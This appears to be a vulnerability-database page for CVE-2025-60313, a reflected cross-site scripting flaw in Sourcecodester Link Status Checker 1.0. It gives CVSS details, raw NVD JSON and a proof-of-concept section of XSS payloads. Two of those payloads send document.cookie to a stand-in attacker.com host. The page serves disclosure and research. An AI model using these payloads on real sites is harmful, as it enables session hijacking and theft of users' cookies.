Security Vulnerability Report
中文
CVE-2025-60313 CVSS 6.1 MEDIUM

CVE-2025-60313

Published: 2025-10-08 15:16:25
Last Modified: 2025-10-09 16:07:36

Description

Sourcecodester Link Status Checker 1.0 is vulnerable to a Cross-Site Scripting (XSS) in the Enter URLs to check input field. This allows a remote attacker to execute arbitrary code.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rems:link_status_checker:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Link Status Checker 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60313: Sourcecodester Link Status Checker 1.0 - Reflected XSS PoC --> <!-- Vulnerability Location: "Enter URLs to check" input field --> <!-- Attack Vector: Remote, requires user interaction --> <!-- Method 1: Direct script injection via URL input field --> <script>alert('XSS-CVE-2025-60313')</script> <!-- Method 2: Using img tag with onerror event handler --> <img src=x onerror=alert(document.cookie)> <!-- Method 3: Using svg tag with onload event --> <svg onload=alert('XSS')> <!-- Method 4: Crafted malicious URL to exploit reflected XSS --> <!-- URL example: http://target/index.php?url=<script>alert(document.cookie)</script> --> <!-- Or via POST request body to the URL check form --> <!-- Full exploit URL pattern: --> <!-- http://vulnerable-site/link-checker/?urls=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> --> <!-- Cookie stealing payload example --> <script>new Image().src="http://attacker.com/steal.php?cookie="+document.cookie;</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60313", "sourceIdentifier": "[email protected]", "published": "2025-10-08T15:16:24.820", "lastModified": "2025-10-09T16:07:35.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sourcecodester Link Status Checker 1.0 is vulnerable to a Cross-Site Scripting (XSS) in the Enter URLs to check input field. This allows a remote attacker to execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rems:link_status_checker:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "68B088C2-1DAA-4C6C-B065-FE748068C6E2"}]}]}], "references": [{"url": "https://github.com/ChuckBartowski7/Vulnerability-Research/blob/main/CVE-2025-60313/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18275/link-status-checker-using-php-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}